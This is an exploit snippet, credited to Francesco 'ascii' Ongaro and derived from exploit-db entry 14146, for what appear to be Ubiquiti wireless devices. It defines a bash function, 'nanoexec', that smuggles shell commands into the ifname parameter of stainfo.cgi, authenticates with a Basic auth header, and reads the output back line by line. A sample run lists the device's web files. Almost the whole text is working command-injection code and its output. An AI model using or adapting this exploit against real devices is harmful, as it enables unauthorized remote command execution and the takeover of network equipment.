# Francesco `ascii` Ongaro
# Original exploit: http://www.exploit-db.com/exploits/14146/
$ function nanoexec() { FETCH_TARGET="$1"; FETCH_COMMAND="`echo $3 | php -r 'echo urlencode(trim(file_get_contents("php://stdin")));'`"; echo "Command: $FETCH_COMMAND"; FETCH_AUTH="$2"; FETCH_LINES="`curl -kis "$FETCH_TARGET/stainfo.cgi?ifname=eth0;echo%20-e%20%22foobar\n%60$FETCH_COMMAND|grep%20%22.*%22%20-c%60%22" -H "Authorization: Basic $FETCH_AUTH" | grep "Station " | sed "s/
Station //g;s/ \[ \]<\/th><\/tr>$//g"`"; echo "Lines to fetch: $FETCH_LINES"; for i in `seq 1 $FETCH_LINES`; do curl -kis "$FETCH_TARGET/stainfo.cgi?ifname=eth0;echo%20-e%20%22foobar\n%60$FETCH_COMMAND|tail%20-n%20$(($FETCH_LINES-$i))%60%22" -H "Authorization: Basic $FETCH_AUTH" | grep "Station " | sed "s/Station //g;s/ \[ \]<\/th><\/tr>$//g"; done }
$ nanoexec https://1.2.3.4 ANTANI== "ls -la"
Command: ls+-la
Lines to fetch: 87
-rwx------ 1 ubnt admin 3414 Oct 13 14:56 admin.cgi
-rwxr-x--- 1 ubnt admin 6638 Oct 13 14:56 advanced.cgi
-rw-r--r-- 1 ubnt admin 1313 Oct 13 14:56 ajax.js
^C